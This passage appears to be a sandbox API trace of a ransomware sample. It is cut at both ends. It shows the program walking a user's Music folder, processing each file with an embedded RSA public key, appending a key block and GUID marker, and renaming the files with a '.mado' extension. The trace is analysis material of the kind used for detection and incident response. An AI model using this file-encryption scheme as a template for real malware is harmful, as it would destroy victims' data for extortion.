KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.725] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.726] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.726] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.726] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.726] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.726] GetLastError () returned 0x0 [0204.726] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.726] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.726] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.726] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.726] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6c0) returned 0x3b81690 [0204.727] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80c00 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80c48 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.727] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe460 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe448 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.728] GetCurrentThreadId () returned 0x600 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b723b0 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.729] GetCurrentThreadId () returned 0x600 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe430 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.731] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd6bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.731] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.731] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.731] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.731] CloseHandle (hObject=0x63c) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.732] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UCaiPZ4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ucaipz4.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UCaiPZ4.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ucaipz4.wav.mado")) returned 1 [0204.734] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf454e1f0, ftCreationTime.dwHighDateTime=0x1d5db5e, ftLastAccessTime.dwLowDateTime=0x20b1bad0, ftLastAccessTime.dwHighDateTime=0x1d5d974, ftLastWriteTime.dwLowDateTime=0x20b1bad0, ftLastWriteTime.dwHighDateTime=0x1d5d974, nFileSizeHigh=0x0, nFileSizeLow=0xf52d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uoP6wD.mp3", cAlternateFileName="")) returned 1 [0204.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.734] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uoP6wD.mp3") returned=".mp3" [0204.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uoP6wD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uop6wd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.735] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=62765) returned 1 [0204.735] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.737] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf507, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.737] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.739] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.739] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xf52d, lpOverlapped=0x0) returned 1 [0204.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.740] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.741] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.741] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.741] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.741] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.741] GetLastError () returned 0x0 [0204.741] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.741] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.741] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.741] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.741] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.741] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe478 [0204.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe460 [0204.742] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf52d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.742] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.742] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.742] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.742] CloseHandle (hObject=0x63c) returned 1 [0204.744] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uoP6wD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uop6wd.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uoP6wD.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uop6wd.mp3.mado")) returned 1 [0204.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.744] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.745] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe91fec60, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x207a6de0, ftLastAccessTime.dwHighDateTime=0x1d5d916, ftLastWriteTime.dwLowDateTime=0x207a6de0, ftLastWriteTime.dwHighDateTime=0x1d5d916, nFileSizeHigh=0x0, nFileSizeLow=0x12b13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uRbtjou9eX9oaPptUC.m4a", cAlternateFileName="URBTJO~1.M4A")) returned 1 [0204.745] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uRbtjou9eX9oaPptUC.m4a") returned=".m4a" [0204.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uRbtjou9eX9oaPptUC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\urbtjou9ex9oapptuc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.745] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=76563) returned 1 [0204.746] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.748] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12aed, 